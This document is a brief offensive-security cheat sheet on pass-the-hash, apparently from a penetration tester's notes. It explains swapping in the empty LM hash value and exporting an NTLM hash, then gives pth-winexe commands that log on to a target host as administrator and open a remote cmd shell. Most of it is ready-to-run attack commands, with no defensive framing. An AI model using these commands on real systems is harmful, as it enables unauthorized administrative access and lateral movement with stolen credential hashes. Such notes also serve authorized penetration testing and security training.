# Passing the Hash

### Passing the hash 

Authenticate by passing the hash as a password instead of cracking it. 

Replace the NOPASSWORD from the hashes with an empty LM hash: **aad3b435b51404eeaad3b435b51404ee** 

```
pth-(TAB to see Options) 

export SMBHASH=...........HASH.................        # Remove NO PASSWORD on the hashes with an NTLM Hash  

pth-winexe -U administrator% //10.10.10.10 cmd         # Log on to the target

OR (just run the following)

pth-winexe -U administrator%hash //10.10.10.10 cmd     # Log on to the target
```